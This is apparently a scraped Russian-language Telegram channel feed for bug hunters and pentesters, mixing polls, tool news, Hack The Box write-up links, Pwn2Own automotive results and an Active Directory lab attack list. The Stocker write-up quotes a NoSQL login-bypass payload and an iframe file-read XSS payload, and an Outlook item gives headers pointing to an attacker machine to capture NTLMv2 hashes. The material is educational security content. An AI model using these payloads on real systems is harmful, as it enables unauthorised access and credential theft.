Какие критерии экспертности для вас важны?
Anonymous Poll
46%
Опыт работы
42%
Успешные кейсы
8%
Известность в сообществе
20%
Умение обучать других
11%
Образование
8%
Наличие сертификатов
66%
Глубокие знания в специализированной области
1%
Свой вариант (напишу в комментарии)
16%
Посмотреть результаты
Если зарегистрировать учётку на сервисе builtwith и обратить внимание на раздел relationships у запрошенного домена, то можно найти связанные домены.
Полезно будет тем багхантерам, которые рассматривают wildcard домены и большие скоупы в ходе багбаунти. Пользуйтесь 🎯
#recon #bugbounty #tips
Полезно будет тем багхантерам, которые рассматривают wildcard домены и большие скоупы в ходе багбаунти. Пользуйтесь 🎯
#recon #bugbounty #tips
📦 HTB: Stocker
Анализируя райтапы различных актуальных машин с Hack The Box, попалось любопытное исследование, в котором автор сначала обходит аутентификацию, а затем эксплуатирует багу «чтение произвольных файлов» через функционал генерации PDF-файла.
📌 Берите на заметку рабочие кейсы и читайте полный райтап:
1. Если заголовок
, то получится войти в систему. Итак, пока есть хотя бы один пользователь с именем пользователя, отличным от
2. При нажатии «Отправить покупку» POST-запрос отправляется на
Если поле
, то на выходе получится Server Side XSS и возможность чтения произвольных файлов👏
#tips #writeup #pentest #bugbounty
Анализируя райтапы различных актуальных машин с Hack The Box, попалось любопытное исследование, в котором автор сначала обходит аутентификацию, а затем эксплуатирует багу «чтение произвольных файлов» через функционал генерации PDF-файла.
📌 Берите на заметку рабочие кейсы и читайте полный райтап:
1. Если заголовок
Content-Type
изменить с application/x-www-form-urlencoded
на application/json
и отправить что-то вроде:{"username":{"$ne": "0xdf"}, "password": {"$ne":"0xdf"}}
, то получится войти в систему. Итак, пока есть хотя бы один пользователь с именем пользователя, отличным от
0xdf
, и паролем, отличным от 0xdf
, этот пользователь будет возвращен. 2. При нажатии «Отправить покупку» POST-запрос отправляется на
/api/order
с таким телом:{"basket":[{"_id":"638f116eeb060210cbd83a91","title":"Axe","description":"It's an axe.","image":"axe.jpg","price":12,"currentStock":21,"__v":0,"amount":1}]}
Если поле
title
заменить на <img src=\"x\" onerror=\"document.write('<iframe src=file:///var/www/dev/index.js width=100% height=100%></iframe>')\" />
, то на выходе получится Server Side XSS и возможность чтения произвольных файлов
#tips #writeup #pentest #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Представьте, что вы оказались в сложной ситуации, и вам нужно принять решение. Какого сотрудника вы возьмете в команду?
Anonymous Poll
32%
С достойным портфолио и хард-скиллами, но неприятного в общении
44%
Легкого в общении и целеустремленного, но проседающего в технических навыках
25%
Посмотреть результаты
🤔 Устали сначала собирать, а потом анализировать данные о различных CVE из NVD и других критически важных источников? Команда ProjectDiscovery позаботилась об этом и представила новый инструмент cvemap.
Он предоставляет структурированный и простой в навигации CLI к различным базам данных уязвимостей, а также позволяет выполнить:
✔️ Поиск и запрос набора данных CVE
✔️ Сопоставление CVE с Known Exploited Vulnerabilities Catalog
✔️ Сопоставление CVE и Exploit Prediction Scoring System
✔️ Сопоставление CVE и Common Platform Enumeration
✔️ Сопоставление CVE с PoC'ами на GitHub
✔️ Сопоставление CVE с Nuclei Template
✔️ Сопоставление CVE с отчетами HackerOne
#news #tools #CVE
Он предоставляет структурированный и простой в навигации CLI к различным базам данных уязвимостей, а также позволяет выполнить:
✔️ Поиск и запрос набора данных CVE
✔️ Сопоставление CVE с Known Exploited Vulnerabilities Catalog
✔️ Сопоставление CVE и Exploit Prediction Scoring System
✔️ Сопоставление CVE и Common Platform Enumeration
✔️ Сопоставление CVE с PoC'ами на GitHub
✔️ Сопоставление CVE с Nuclei Template
✔️ Сопоставление CVE с отчетами HackerOne
go install github.com/projectdiscovery/cvemap/cmd/cvemap@latest
#news #tools #CVE
📌 Ловите теоретический и практический гайд от PortSwigger, из которого вы получите базовые навыки. Ниже — только некоторые из примеров лабораторий:
• Excessive trust in client-side controls
• Failing to handle unconventional input
• Making flawed assumptions about user behavior
• Domain-specific flaws
• Providing an encryption oracle
#bugbounty #pentest #practice
Please open Telegram to view this post
VIEW IN TELEGRAM
📦 HTB Sandworm: выходим из песочницы Firejail и повышаем привилегии в Linux
📦 HTB Pilgrimage: повышаем привилегии через уязвимость в Binwalk
📦 HTB Cybermonday: эксплуатируем путаницу ключей JWT
📦 HTB Authority: повышаем привилегии в Windows через ESC1 и Pass the Cert
📦 HTB Coder: реверсим шифровальщик и применяем технику ESC5
📦 HTB Sau: раскручиваем цепочку SSRF и инъекций команд до захвата веб-сервера
📦 HTB Zipping: используем инъекцию нулевого байта в ZIP-архиве, чтобы загрузить шелл
📦 HTB Bookworm: эксплуатируем сложную XSS с байпасом CSP
🔍 Лабы по форензике: Knock Knock и Tick Tock
#writeup #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
📌 На соревнованиях были продемонстрированы 49 0-day в автомобильных информационно-развлекательных платформах, ОС и устройствах зарядки электромобилей. Немного деталей об атаках, которые показали исследователи:
• Два взлома окружения на базе дистрибутива Automotive Grade Linux ($47500, $35000)
• Взлом информационно-развлекательной системы автомобиля Tesla
• Взлом модема, используемого в автомобиле Tesla
• Пять взломов информационно-развлекательной системы на базе платформы Sony XAV-AX5500
• Взлом информационно-развлекательной системы на базе платформы Pioneer DMH-WT7600NEX
• Шесть взломов информационно-развлекательной системы на базе платформы Alpine Halo9 iLX-F509
• Два взлома зарядной станции Ubiquiti Connect EV Station
• Три взлома зарядной станции Phoenix Contact CHARX SEC-3100
• Взлом зарядной станции EMPORIA EV Charger Level 2
• Четыре взлома зарядной станции JuiceBox 40 Smart EV
• Семь взломов домашней зарядной станции ChargePoint Home Flex, позволивших выполнить код на уровне прошивки устройства
• Три взлома зарядной станции Autel MaxiCharger AC Wallbox Commercial
#hackevent
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Команда Varonis обнаружила новую багу в функции обмена календарями в Microsoft Outlook, при котором добавление двух заголовков в электронное письмо заставляет Outlook делиться контентом и связываться с указанной машиной, создавая возможность перехвата хэша NTLM v2.
К слову, это новый способ получения NTLM-хэшей среди двух других новых способов: с помощью Windows Performance Analyzer и проводника Windows.
Для тех, кто не знает, NTLM v2 — это криптографический протокол, используемый Windows для аутентификации пользователей на удаленных серверах. Хотя NTLM v2 является более безопасной версией оригинального NTLM, v2 все еще уязвим для атак методом брутфорса и не только.
📌 Те самые заголовки Outlook:
"Content-Class" = "Sharing"
"x-sharing-config-url" = \\(Attacker machine)\a.ics
#pentest #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
📦 Невероятно крутые и доступные в понимании (особенно если смотреть после прочтения райтапа) видеоразборы заданий с HackTheBox от архитектора лабораторий.
Вот, например, разбор SSTI в приложении на Flask, взлом PyJWT и реверс/брутфорс TOPT Browser Plugin Export.
📺 Смотреть плейлист
#ctf #pentest #practice
Вот, например, разбор SSTI в приложении на Flask, взлом PyJWT и реверс/брутфорс TOPT Browser Plugin Export.
#ctf #pentest #practice
Please open Telegram to view this post
VIEW IN TELEGRAM
🛠 btop — инструмент для мониторинга ресурсов системы, который выводит статистку использования процессора, памяти, сети и дисков. Это альтернатива привычного вам инструмента с более приятным UI, поддержкой мыши, простой сортировкой/фильтрацией, кастомными настройками, возможностью отображения индикатора батареи и т. д.
👉 GutHub
#tools #linux
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
📙 Книга тайных знаний — тщательно подобранная коллекция ресурсов, руководств, шпаргалок, блогов, советов, однострочников, CLI-инструментов и многого другого для системных и сетевых администраторов, DevOps-специалистов, пентестеров и исследователей безопасности.
👉 GitHub
#cheatsheet
👉 GitHub
#cheatsheet
Всеволод Кокорин, исследователь безопасности в SolidLab, делится историей нахождения уязвимости и описывает технические аспекты, которые привели к её возникновению. Сама уязвимость существовала в течение длительного времени и была устранена в октябре 2023 года.
📌 Вы узнаете про Service Worker + PWA, про аспекты, связанные с Payment Request API и спецификацией JIT-installed воркеров, а также про то, как архитектурные решения в веб-приложениях могут привести к серьезным багам.
👉 Читать
#pentest #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🧰GOAD — одна из самых актуальных и самодостаточных тестовых лаб для пентеста окружения на базе Active Directory.
Главная цель — предоставить пентестерам уязвимую среду Active Directory, готовую к использованию для отработки основных атак, включая:
• Password reuse between computer (PTH)
• Spray User = Password
• Password in description
• SMB share anonymous
• SMB not signed
• Responder
• Zerologon
• Windows defender
• ASREPRoast
• Kerberoasting
• AD Acl abuse
• Unconstraint delegation
• Ntlm relay
• Constrained delegation
• Install MSSQL
• MSSQL trusted link
• MSSQL impersonate
• Install IIS
• Upload asp app
• Multiples forest
• Anonymous RPC user listing
• Child parent domain
• Generate certificate and enable ldaps
• ADCS - ESC 1/2/3/4/6/8
• Certifry
• Samaccountname/nopac
• Petitpotam unauthent
• Printerbug
• Drop the mic
• Shadow credentials
• Mitm6
• Add LAPS
• GPO abuse
• Add Webdav
• Add RDP bot
• Add full proxmox integration
• Add Gmsa и многие другие
#practice #pentest
Главная цель — предоставить пентестерам уязвимую среду Active Directory, готовую к использованию для отработки основных атак, включая:
• Password reuse between computer (PTH)
• Spray User = Password
• Password in description
• SMB share anonymous
• SMB not signed
• Responder
• Zerologon
• Windows defender
• ASREPRoast
• Kerberoasting
• AD Acl abuse
• Unconstraint delegation
• Ntlm relay
• Constrained delegation
• Install MSSQL
• MSSQL trusted link
• MSSQL impersonate
• Install IIS
• Upload asp app
• Multiples forest
• Anonymous RPC user listing
• Child parent domain
• Generate certificate and enable ldaps
• ADCS - ESC 1/2/3/4/6/8
• Certifry
• Samaccountname/nopac
• Petitpotam unauthent
• Printerbug
• Drop the mic
• Shadow credentials
• Mitm6
• Add LAPS
• GPO abuse
• Add Webdav
• Add RDP bot
• Add full proxmox integration
• Add Gmsa и многие другие
#practice #pentest